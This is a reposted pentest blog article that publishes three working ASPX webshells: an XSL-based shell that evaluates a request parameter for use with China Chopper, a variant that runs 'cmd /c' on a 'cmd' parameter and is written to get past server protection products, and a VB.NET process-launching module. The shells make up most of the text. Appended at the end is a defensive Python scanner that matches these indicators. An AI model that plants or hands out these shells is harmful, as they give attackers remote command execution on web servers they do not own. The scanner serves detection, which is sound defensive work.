Xsl Exec Webshell (aspx)
2020-02-15 11:04:03 Author: mp.weixin.qq.com


Webshells built on XSL have been published before. For example, here is an aspx one:

<%@ Page Language="C#" Debug="true" %>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Xml"%>
<%@ import Namespace="System.Xml.Xsl"%>
<%
// Dummy input document; the transform exists only to trigger the script block.
string xml=@"<?xml version=""1.0""?><root>test</root>";
// Stylesheet carrying a JScript.NET block (msxsl:script). The assembly references
// give the script access to System.Web so it can reach the current HttpContext.
string xslt=@"<?xml version='1.0'?>
<xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">
    <msxsl:script language=""JScript"" implements-prefix=""zcg"">
        <msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
        <msxsl:assembly name=""System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
        <msxsl:assembly name=""System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
        <msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
        <![CDATA[function xml() {var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;var Server=c.Server;eval(Request.Item['a'],'unsafe');Response.End();}]]>
    </msxsl:script>
<xsl:template match=""/root"">
    <xsl:value-of select=""zcg:xml()""/>
</xsl:template>
</xsl:stylesheet>";
XmlDocument xmldoc=new XmlDocument();
xmldoc.LoadXml(xml);
XmlDocument xsldoc=new XmlDocument();
xsldoc.LoadXml(xslt);
XslCompiledTransform xct=new XslCompiledTransform();
// TrustedXslt enables script blocks (and the document() function). With
// XsltSettings.Default, Load would throw on the msxsl:script element and nothing would run.
xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver());
// Running the transform calls zcg:xml(), which evals the 'a' request parameter.
xct.Transform(xmldoc,null,new MemoryStream());
%>

The password is a, and this webshell can be connected to with China Chopper (菜刀). During testing I ran into the following situation: the server had a protection product such as Safedog (安全狗) installed, so the various packets the client submits might be intercepted, while all I actually needed was command execution. For convenience I wrote a command-execution webshell that echoes output and whose password can be changed; the code is as follows:

<%@page language="C#"%>
<%@ import Namespace="System.IO"%>
<%@ import Namespace="System.Xml"%>
<%@ import Namespace="System.Xml.Xsl"%>
<%
string xml=@"<?xml version=""1.0""?><root>test</root>";
// Same msxsl:script trick as above, but instead of eval the script runs
// cmd /c <value of the 'cmd' request parameter> through WScript.Shell
// (COM interop is available to JScript.NET under full trust) and echoes stdout.
string xslt=@"<?xml version='1.0'?>
<xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">
    <msxsl:script language=""JScript"" implements-prefix=""zcg"">
    <msxsl:assembly name=""mscorlib, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
    <msxsl:assembly name=""System.Data, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089""/>
    <msxsl:assembly name=""System.Configuration, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
    <msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
        <![CDATA[function xml(){
        var c=System.Web.HttpContext.Current;var Request=c.Request;var Response=c.Response;
        var command = Request.Item['cmd'];
        var r = new ActiveXObject(""WScript.Shell"").Exec(""cmd /c ""+command);
        // Only StdOut is read, so a command's error output (stderr) is not echoed back.
        var OutStream = r.StdOut;
        var Str = """";
        while (!OutStream.atEndOfStream) {
            Str = Str + OutStream.readAll();
            }
        Response.Write(""<pre>""+Str+""</pre>"");
        }]]>
    </msxsl:script>
<xsl:template match=""/root"">
    <xsl:value-of select=""zcg:xml()""/>
</xsl:template>
</xsl:stylesheet>";
XmlDocument xmldoc=new XmlDocument();
xmldoc.LoadXml(xml);
XmlDocument xsldoc=new XmlDocument();
xsldoc.LoadXml(xslt);
// XsltSettings(enableDocumentFunction: false, enableScript: true); the explicit
// EnableScript assignment that follows is redundant but harmless.
XsltSettings xslt_settings = new XsltSettings(false, true);
xslt_settings.EnableScript = true;
try{
    XslCompiledTransform xct=new XslCompiledTransform();
    xct.Load(xsldoc,xslt_settings,new XmlUrlResolver());
    xct.Transform(xmldoc,null,new MemoryStream());
}
catch (Exception){
    // Any compile or runtime failure of the stylesheet is reported as a bare "Error".
    Response.Write("Error");
}
%>

The password is cmd and can be changed as you like; the test is shown in the screenshot below:

Also attached, the command-execution module from a full-featured webshell (大马):

<%@ Page Language="VB" Debug="true" %>
<%@ import Namespace="System.IO" %>
<%@ import Namespace="System.Diagnostics" %>
<script runat="server">
' Runs the program from the "Program" box with the "Arguments" box as its argument
' string, captures stdout and echoes it HTML-escaped inside a <pre> block.
Sub RunCmd(Src As Object, E As EventArgs)
  Dim myProcess As New Process()
  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
  myProcessStartInfo.UseShellExecute = false   ' required for output redirection
  myProcessStartInfo.RedirectStandardOutput = true
  myProcess.StartInfo = myProcessStartInfo
  myProcessStartInfo.Arguments=xcmd.text
  myProcess.Start()
  Dim myStreamReader As StreamReader = myProcess.StandardOutput
  Dim myString As String = myStreamReader.ReadToEnd()
  myProcess.Close()
  mystring=replace(mystring,"<","&lt;")
  mystring=replace(mystring,">","&gt;")
  result.text= vbcrlf & "<pre>" & mystring & "</pre>"
End Sub
</script>
<html>
<body>
<form runat="server">
<p><asp:Label id="L_p" runat="server" width="80px">Program</asp:Label>
<asp:TextBox id="xpath" runat="server" Width="300px">c:\windows\system32\cmd.exe</asp:TextBox>
<p><asp:Label id="L_a" runat="server" width="80px">Arguments</asp:Label>
<asp:TextBox id="xcmd" runat="server" Width="300px" Text="/c net user">/c net user</asp:TextBox>
<p><asp:Button id="Button" onclick="RunCmd" runat="server" Width="100px" Text="Run"></asp:Button>
<p><asp:Label id="result" runat="server"></asp:Label>
</form>
</body>
</html>
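All three shells above leave the same handful of source-level indicators on disk, which is what a defender on an IIS webroot can hunt for: the `msxsl:script` element, `XsltSettings.TrustedXslt` or `EnableScript = true`, `eval(..., 'unsafe')`, `ActiveXObject("WScript.Shell")`, and a `Process`/`ProcessStartInfo` with redirected standard output. The Python script below is an added example (not code from this post or from Evi1cg) that scores a page on those indicators and, for the XSL variants, extracts the embedded stylesheet, reverses the C# verbatim-string quoting (`""` back to `"`) and lists each msxsl:script block with its language, prefix, referenced assemblies and body. The indicator weights and thresholds are this example's own assumptions, the file name `scan_xsl_shells.py` is hypothetical, and the samples are constructed, trimmed copies of the shells shown above plus one benign page.

```python
"""Static triage of ASPX sources for the XSL (msxsl:script) and Process-spawning
webshell patterns shown in this post.  Added example, not the post's own code."""
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

MSXSL_NS = "urn:schemas-microsoft-com:xslt"
# (name, regex, weight); weights and thresholds are this example's own assumption.
# Quotes match as {1,2}: inside a C# verbatim string (@"...") every literal quote is
# doubled, so the .aspx file really contains ActiveXObject(""WScript.Shell"").
INDICATORS = [
    ("msxsl_script", r"<msxsl:script\b", 5),
    ("trusted_xslt", r"XsltSettings\.TrustedXslt", 4),
    ("enable_script", r"EnableScript\s*=\s*true|new\s+XsltSettings\s*\(\s*\w+\s*,\s*true\s*\)", 4),
    ("eval_unsafe", r"\beval\s*\([^)]*,\s*['\"]unsafe['\"]\s*\)", 5),
    ("wscript_shell", r"ActiveXObject\s*\(\s*['\"]{1,2}WScript\.Shell['\"]{1,2}", 5),
    ("process_start", r"\bProcessStartInfo\b|\bProcess\s*\(\s*\)", 3),
    ("redirect_stdout", r"RedirectStandardOutput\s*=\s*true", 2),
    ("diagnostics_import", r"Namespace\s*=\s*['\"]System\.Diagnostics['\"]", 1),
    ("cmd_c", r"\bcmd(?:\.exe)?\s*/c\b", 3),
    ("request_param", r"\bRequest\.(?:Item|Form|QueryString|Params)\s*[\[(]", 2),
]
STYLESHEET_RE = re.compile(r"<xsl:stylesheet\b.*?</xsl:stylesheet>", re.DOTALL | re.IGNORECASE)

def verdict(score):
    return "webshell" if score >= 8 else "suspicious" if score >= 4 else "clean"

def scan_source(text):
    """Count matches per indicator; each indicator adds its weight once."""
    hits, score = {}, 0
    for name, pattern, weight in INDICATORS:
        n = len(re.findall(pattern, text, re.IGNORECASE))
        if n:
            hits[name], score = n, score + weight
    return {"hits": hits, "score": score, "verdict": verdict(score)}

def embedded_scripts(text):
    """Extract each stylesheet literal, undo the verbatim-string quoting, parse it and
    list its msxsl:script blocks (language, prefix, assemblies, body)."""
    found = []
    for m in STYLESHEET_RE.finditer(text):
        try:
            root = ET.fromstring(m.group(0).replace('""', '"'))
        except ET.ParseError:
            continue  # not well-formed after unquoting; the regex hits still stand
        for el in root.iter(f"{{{MSXSL_NS}}}script"):
            found.append({
                "language": el.get("language"),
                "prefix": el.get("implements-prefix"),
                "assemblies": [a.get("name") for a in el.findall(f"{{{MSXSL_NS}}}assembly")],
                "body": "".join(el.itertext()).strip(),  # CDATA may sit in a child's tail
            })
    return found

def scan_tree(root, exts=(".aspx", ".ashx", ".asmx", ".asax", ".xsl", ".xslt")):
    """Walk a webroot; return every non-clean file with its indicators and scripts."""
    out = []
    for p in Path(root).rglob("*"):
        if p.is_file() and p.suffix.lower() in exts:
            text = p.read_text(encoding="utf-8", errors="replace")
            r = scan_source(text)
            if r["verdict"] != "clean":
                out.append({**r, "path": str(p), "scripts": embedded_scripts(text)})
    return out

# Constructed samples: trimmed copies of the three shells in this post plus a benign page.
SAMPLES = {
    "xsl_eval": r'''<%@ Page Language="C#" %><%@ import Namespace="System.Xml.Xsl"%><%
string xslt=@"<xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">
<msxsl:script language=""JScript"" implements-prefix=""zcg""><msxsl:assembly name=""System.Web, Version=2.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a""/>
<![CDATA[function xml(){var c=System.Web.HttpContext.Current;var Request=c.Request;eval(Request.Item['a'],'unsafe');c.Response.End();}]]></msxsl:script>
<xsl:template match=""/root""><xsl:value-of select=""zcg:xml()""/></xsl:template></xsl:stylesheet>";
xct.Load(xsldoc,XsltSettings.TrustedXslt,new XmlUrlResolver()); %>''',
    "xsl_cmd": r'''<%@page language="C#"%><%
string xslt=@"<xsl:stylesheet version=""1.0"" xmlns:xsl=""http://www.w3.org/1999/XSL/Transform"" xmlns:msxsl=""urn:schemas-microsoft-com:xslt"" xmlns:zcg=""zcgonvh"">
<msxsl:script language=""JScript"" implements-prefix=""zcg""><![CDATA[function xml(){var c=System.Web.HttpContext.Current;
var r=new ActiveXObject(""WScript.Shell"").Exec(""cmd /c ""+c.Request.Item['cmd']);c.Response.Write(""<pre>""+r.StdOut.readAll()+""</pre>"");}]]></msxsl:script>
<xsl:template match=""/root""><xsl:value-of select=""zcg:xml()""/></xsl:template></xsl:stylesheet>";
XsltSettings xslt_settings = new XsltSettings(false, true); xslt_settings.EnableScript = true; %>''',
    "vb_process": r'''<%@ Page Language="VB" %><%@ import Namespace="System.Diagnostics" %><script runat="server">
Sub RunCmd(Src As Object, E As EventArgs)
  Dim myProcess As New Process()
  Dim myProcessStartInfo As New ProcessStartInfo(xpath.text)
  myProcessStartInfo.RedirectStandardOutput = true
  myProcess.StartInfo = myProcessStartInfo : myProcess.Start()
  result.text = "<pre>" & myProcess.StandardOutput.ReadToEnd() & "</pre>"
End Sub</script>''',
    "benign": r'''<%@ Page Language="C#" %><% string name = Request.QueryString["name"]; Response.Write("<p>Hello, " + Server.HtmlEncode(name) + "</p>"); %>''',
}

if __name__ == "__main__":
    if len(sys.argv) > 1:  # e.g. python scan_xsl_shells.py C:\inetpub\wwwroot
        for r in scan_tree(sys.argv[1]):
            print(r["verdict"], r["score"], r["path"], sorted(r["hits"]))
    else:
        for label, src in SAMPLES.items():
            r = scan_source(src)
            print(f"{label:11} {r['verdict']:10} score={r['score']:2} hits={sorted(r['hits'])}")
```

Run it with a directory argument to walk a webroot, or with no arguments to score the built-in samples. Treat the output as triage, not a verdict: the VB.NET Process shell only reaches `suspicious` because it takes its program and arguments from server controls rather than from `Request`, and a legitimate page that shells out would score the same, so review hits by hand. A shell that keeps its stylesheet in a separate `.xsl` file rather than inline is why those extensions are included in the walk; one that assembles the indicator strings at runtime will not be caught by static matching at all.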

https://github.com/Ridter/Pentest/


Source: Evi1cg's blog

Original link:

https://evi1cg.me/archives/Xsl_Exec_Webshell.html



Article source: http://mp.weixin.qq.com/s?__biz=MzAxMjE3ODU3MQ==&mid=2650459793&idx=3&sn=4d771b047ed5aa3aeb47e301989d181f&chksm=83bbab75b4cc2263ca40f17d1c55d6867b6ca87fd568f23a7badaa85ab428d6ef74e8760a5b8#rd